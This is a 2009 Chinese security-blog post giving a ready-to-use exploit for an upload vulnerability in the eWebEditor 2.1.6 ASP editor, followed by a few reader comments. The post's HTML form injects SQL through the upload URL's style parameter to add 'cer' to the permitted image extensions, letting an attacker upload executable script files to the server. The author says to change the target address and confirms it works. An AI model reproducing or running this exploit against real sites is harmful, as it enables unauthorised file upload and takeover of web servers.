eWebEditor 2.1.6 asp版上传漏洞利用程序

当前位置:夜火博客 > 漏洞信息 > eWebEditor 2.1.6 asp版上传漏洞利用程序

eWebEditor 2.1.6 asp版上传漏洞利用程序

2009-2-13 20:17:54 分类:漏洞信息作者:xloong 已被围观loading 次被网友评论3条 我要评论

eWebEditor 2.1.6 asp版上传漏洞利用程序，修改上传地址保存为HTM文件，打开可以直接上传CER文件，测试成功。上传后地址看源文件。

<H1>eWebEditor 2.1.6 asp版上传漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载，请注明：转自：夜火博客 [ http://www.15897.com/ ]

本文链接地址： http://www.15897.com/blog/post/eWebEditor-2.1.6-asp-upload-exploit.html

Tags: eWebEditor exploit 漏洞信息

| More

已有3位网友对本文做了一针见血的评论【我要评论】

« 哑巴嗅探器 SoftPerfect Network Scanner v3.9.186

eWebEditor 2.8.0最终版删除任意文件漏洞利用程序 »

发表评论>>

nuke 说：

2009-2-14 19:45:53

这个漏洞出来很久了怎么最近又炒热乎了？

回复该留言
xloong 说：

2009-2-14 20:18:14

老洞新看，温故知新，....。

回复该留言
nuke 说：

2009-2-15 16:38:58

这个漏洞最早是一个非安全界人士发掘的

但是我测试成功率低的可怜
不知道是不是人品问题

回复该留言

夜火博客